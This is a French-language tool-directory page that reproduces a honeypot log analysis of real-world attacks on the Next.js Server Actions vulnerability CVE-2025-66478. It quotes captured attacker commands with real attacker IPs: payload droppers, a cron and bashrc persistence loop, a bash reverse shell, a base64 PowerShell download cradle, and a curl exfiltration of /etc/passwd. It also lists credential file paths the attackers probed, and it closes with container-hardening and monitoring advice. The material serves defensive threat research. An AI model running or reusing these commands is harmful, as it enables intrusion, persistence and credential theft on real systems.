Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-66478 — Analyse de logs d'attaques réelles de CVE-2025-66478 (Next.js Server Actions RCE) avec des échantillons de malware, suivi d'IP d'attaquants, et leçons de durcissement de la sécurité des conteneurs. | Kitploit
Outils/GitHubGitHub/exptechtw/cve-2025-66478
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueAnalyse de MalwareRenseignement sur les MenacesApprentissage et ÉducationRéponse aux Incidents
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Analyse de logs d'attaques réelles de CVE-2025-66478 (Next.js Server Actions RCE) avec des échantillons de malware, suivi d'IP d'attaquants, et leçons de durcissement de la sécurité des conteneurs.

2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Analyse des journaux d'attaques réelles contre la vulnérabilité CVE-2025-66478 - RCE dans les Server Actions Next.js

Aperçu

Ce projet collecte des journaux d'attaques réelles enregistrés par une application Next.js 15.1.2 exposée sur Internet (s'exécutant dans un conteneur Docker). Ces journaux montrent comment la vulnérabilité CVE-2025-66478 est massivement scannée et exploitée par des outils automatisés.

Période d'enregistrement: 2025-12-04 ~ 2025-12-06 (environ 48 heures)

Informations sur l'environnement:

  • Framework: Next.js 15.1.2
  • Environnement d'exécution: Bun v1.2.20
  • Conteneur: Docker (Alpine Linux)
  • Fuseau horaire: Asia/Taipei

Statistiques des types d'attaques

1. Téléchargement et exécution de logiciels malveillants (Dropper/Downloader)

Les attaquants tentent d'exécuter des commandes de téléchargement et d'exécution de logiciels malveillants via la vulnérabilité.

IP source de l'attaqueURL de la charge malveillanteDescription
216.158.232.43http://216.158.232.43:12000/sex.shBotnet/mineur de crypto-monnaie
38.207.161.212http://38.207.161.212/agentProgramme agent malveillant
43.156.63.124http://43.156.63.124/tsdInstallation d'une porte dérobée cron
154.38.121.219res.qiqigece.top/nginx3Programme malveillant déguisé en nginx
47.79.42.91iot.632313373.xyz/nz.shScript de botnet IoT
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shPorte dérobée/mineur
103.135.101.15http://103.135.101.15/wocaosinm.shScript malveillant
38.12.24.231http://38.12.24.231/kworkerProgramme malveillant déguisé en kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shScript d'initialisation

Exemple de commande d'attaque

root@kitploit:~
# Attaque dropper typique
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Installation d'une porte dérobée persistante via cron
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Attaque persistante complexe (tentative de plusieurs méthodes de téléchargement + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Shell Inversé (Reverse Shell)

Les attaquants tentent d'établir une connexion shell inversée pour obtenir un accès interactif.

root@kitploit:~
# Shell inversé Bash
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. Attaques PowerShell (ciblant Windows à mauvais escient)

Les attaquants supposent que la cible est un système Windows et tentent d'exécuter des commandes PowerShell.

root@kitploit:~
# PowerShell malveillant encodé en Base64
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Après décodage :
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Calculs mathématiques pour confirmer la vulnérabilité
powershell -c "41*271"      # = 11111 (code de vérification)
powershell -c "44225*41002" # = 1814113450

4. Collecte d'informations (Information Gathering)

Les attaquants tentent de collecter des informations système pour des attaques ultérieures.

root@kitploit:~
# Collecte d'informations système et exfiltration
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Vol d'identifiants (Credential Harvesting)

Les attaquants tentent de lire divers fichiers sensibles et identifiants.

Chemins sensibles tentés

6. Fuite de variables d'environnement

Variables d'environnement du conteneur exfiltrées avec succès via la vulnérabilité :

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. Exfiltration DNS

Les attaquants utilisent des requêtes DNS pour exfiltrer des données ou confirmer la vulnérabilité :

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

Causes de l'échec des attaques

La plupart des attaques échouent en raison de la nature allégée du conteneur Alpine Linux :

Outil manquantImpact
curlImpossible de télécharger les charges utiles malveillantes

Bien que wget soit disponible, certains scripts malveillants dépendent toujours de curl ou bash en interne, ce qui entraîne leur échec.


Exemples de décodage Base64

Les journaux contiennent de nombreuses données encodées en Base64. Voici quelques résultats de décodage :

Fuite d'informations système

root@kitploit:~
# digest: 'cm9vdAo='
Décodé : root

# digest: 'dGVzdAo='
Décodé : test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Décodé : vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Décodé : uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Fuite de liste de répertoire

root@kitploit:~
# Contenu du répertoire /tmp
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Décodé :
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Statistiques des IP sources des attaques

Voici les adresses IP sources des attaques enregistrées :


Méthodes d'exploitation (Vecteurs d'attaque)

Appel de Server Action

Les attaquants tentent d'appeler des Server Actions inexistantes :

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

Fuite d'informations via les réponses d'erreur

Les attaquants utilisent le champ digest dans les messages d'erreur pour exfiltrer des données :

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64 encodé de 'root'

Points clés pédagogiques

1. Bonnes pratiques de sécurité des conteneurs

  • Image minimale : L'utilisation d'images de base légères (comme Alpine) réduit la surface d'attaque
  • Suppression des outils non essentiels : Ne pas installer curl, bash, python, etc., qui pourraient être détournés
  • Système de fichiers en lecture seule : Exécuter le conteneur avec --read-only
  • Utilisateur non root : Exécuter l'application avec un utilisateur non privilégié

2. Correction de la vulnérabilité

  • Mettre à niveau Next.js vers une version corrigée
  • Valider les entrées des Server Actions
  • Mettre en place des règles WAF pour filtrer les requêtes suspectes

3. Surveillance et détection

  • Surveiller les exécutions de sous-processus anormales
  • Surveiller les demandes de connexion réseau sortantes
  • Surveiller les tentatives d'accès aux fichiers sensibles

Avertissement

Ce projet est uniquement destiné à des fins éducatives et de recherche en cybersécurité. Toutes les attaques enregistrées sont de véritables tentatives d'attaque contre un pot de miel de recherche. Veuillez ne pas utiliser ces informations à des fins illégales.


Échantillons de logiciels malveillants

Ce projet contient de véritables échantillons de logiciels malveillants extraits et téléchargés à partir des journaux d'attaque. Pour une analyse détaillée, voir :

malware_samples/ANALYSIS.md

Échantillons obtenus

Résumé des méthodes d'attaque

  1. nz.sh - Installation de l'agent de surveillance Nezha pour la surveillance à distance de la machine victime
  2. tsd.sh + tsd - Mise en place de mécanismes de persistance multiples (cron + systemd + rc.local)
  3. init.sh + agent - Framework de porte dérobée complet prenant en charge plusieurs systèmes, redémarrage automatique, journalisation

Ressources associées

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

Licence

MIT License

Télécharger l’outil
CatégorieChemin
Identifiants cloud/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
Clés SSH/root/.ssh/id_rsa, /root/.ssh/config
Identifiants Git/root/.git-credentials, /root/.gitconfig
Conteneur/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Applications/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Historique Shell/root/.bash_history, /root/.zsh_history
Outils cloud/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Configuration système/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
bash
Impossible d'exécuter certaines syntaxes spécifiques à bash (comme les shells inversés)
powershellAttaques Windows inefficaces
pythonImpossible d'utiliser le téléchargeur Python
Adresse IPPays/Région (estimé)Type d'attaque
216.158.232.43États-UnisDropper
38.165.44.205États-UnisDropper
23.95.44.80États-UnisDropper
154.38.121.219Hong KongMalware (nginx3)
38.207.161.212États-UnisAgent
43.156.63.124ChinePorte dérobée cron
47.79.42.91Chine (Alibaba Cloud)Botnet IoT
47.79.65.237Chine (Alibaba Cloud)Mineur
119.45.243.154Chine (Tencent Cloud)Mineur
144.22.210.54BrésilDropper
217.60.249.228SuèdeDropper
154.26.192.32États-UnisShell inversé
156.234.209.103InconnuCharge PowerShell
38.60.212.106États-UnisCollecte d'informations
103.135.101.15VietnamBotnet
128.199.194.97Singapour (DigitalOcean)Script de configuration
38.12.24.231États-UnisProgramme malveillant persistant
FichierTypeTailleSourceNiveau de menace
nz.shScript Shell931 Biot.632313373.xyzMoyen
tsd.shScript Shell1.7 KB43.156.63.124Élevé
tsdELF 64-bit6.8 MB43.156.63.124Élevé
init.shScript Shell6.1 KBAWS S3Critique
agentELF 64-bit23.7 MBAWS S3Critique
Agtisx.exePE32+ (Windows)24.0 MBAWS S3Critique